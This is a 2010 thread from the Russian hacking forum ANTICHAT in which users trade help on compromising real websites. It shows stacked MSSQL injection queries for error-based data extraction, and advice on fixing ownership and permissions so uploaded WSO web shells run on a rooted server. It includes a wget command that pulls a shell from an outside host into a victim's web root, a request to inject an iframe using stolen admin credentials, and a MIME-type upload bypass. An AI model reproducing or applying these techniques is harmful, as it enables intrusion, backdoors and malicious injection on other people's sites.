ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.03.2010, 16:51
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Есть инъекция в MSSQL - выводит ошибку (с полным query) только если incorrect syntax, все остальные не показываются.
Задача - сделать вывод нужных данных в этой ошибке, т.е. используя выполнение многих запросов за раз с точкой с запятой, засунуть результат селекта в сам запрос.
Составил пока такой запрос:
declare @v as varchar(2048)
select @v = @@version;
exec @v
Msg 203, Level 16, State 2, Line 7
The name 'Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Developer Edition on Windows NT 6.1 (Build 7600: )
' is not a valid identifier.
Но ошибка вылазит, как видно, не на синтакс.
Может есть идеи?
Чтобы было понятнее: хочу получить вот такую ошибку:
Incorrect syntax: Microsoft
SQL : SELECT id, desc from table1 where id='-1';...сам хитрый запрос...; select Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 6.1 (Build 7600: )
Последний раз редактировалось budden; 20.03.2010 в 17:02..
|
|
|
20.03.2010, 17:57
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от budden
Есть инъекция в MSSQL - выводит ошибку (с полным query) только если incorrect syntax, все остальные не показываются.
Задача - сделать вывод нужных данных в этой ошибке, т.е. используя выполнение многих запросов за раз с точкой с запятой, засунуть результат селекта в сам запрос.
Составил пока такой запрос:
Но ошибка вылазит, как видно, не на синтакс.
Может есть идеи?
Чтобы было понятнее: хочу получить вот такую ошибку:
Incorrect syntax: Microsoft
SQL : SELECT id, desc from table1 where id='-1';...сам хитрый запрос...; select Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 6.1 (Build 7600: )
А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
|
|
|
|
20.03.2010, 18:16
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от Root-access
А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
Единственный вывод данных - это ругание на ошибку в синтаксе, т.е. когда сам запрос не может выполниться из-за скажем кавычки внутри или вызова несуществующей функции. Все остальные ошибки (на приведение типов например - convert (int, @@version)) никак себя не проявляют...
PS Приведенная мною ошибка в том посте про incorrect identifier - это результат на локальной системе, на самом сайте она не показывается.
|
|
|
|
20.03.2010, 19:38
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -
Код:
UID of script "/home/*****/public_html/shell.php" is smaller than min_uid
выставил чмоды и выдает уже такую ошибку -
Код:
File "/home/*****/public_html/shell.php" is writeable by group
как сделать что бы шелл нормально работал?
Последний раз редактировалось .:[melkiy]:.; 20.03.2010 в 20:02..
|
|
|
|
20.03.2010, 19:49
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от .:[melkiy]:.
порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку -
Код:
UID of script "/home/*****/public_html/shell.php" is smaller than min_uid
выставил чмоды и выдает уже такую ошибку -
Код:
File "/home/ufaserv/public_html/wso2.php" is writeable by group
как сделать что бы шелл нормально работал?
шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755
|
|
|
|
20.03.2010, 19:58
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от попугай
шелл должен иметь владельца такого же, как и все файлы в папке (chown ufaserv wso.php) и права 755
GID of script "/home/*****/public_html/wso2.php" is smaller than min_gid
UPD: chown username:username * -R , так заработало
Сообщение от daniel_1024
я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
wget http://yoursite.ru/shell.php -O yaneshell.php
xeksite.ru/yaneshell.php
Последний раз редактировалось .:[melkiy]:.; 20.03.2010 в 20:21..
|
|
|
|
20.03.2010, 20:16
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
|
|
|
|
20.03.2010, 22:21
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
Сообщение от daniel_1024
я открыл консоль на сервере..как закачать полноценный шелл ? права рут.
Не понял )).Ну,как бы команды wget,lynx,source никто не отменял  .И вообще,консолей много всяких...может,ты вообще сидел за терминалом рядом с системником?))))
ЗЫ: Я так понял,у тебя bash/csh или чет такое.
|
|
|
|
20.03.2010, 21:25
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите, как можно имея ник и пасс админа, изменить исходный код сайта (например ифрейм поставить)? На сайте не возможно залогинится. Как можно реализовать?
|
|
|
|
20.03.2010, 21:41
|
|
Banned
Регистрация: 14.06.2009
Сообщений: 256
Провел на форуме:
260151
Репутация:
105
|
|
Имеется такой код:
$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;
if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1998151){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1998207){kind=avatar}
Похожие темы
Комбинированный вид
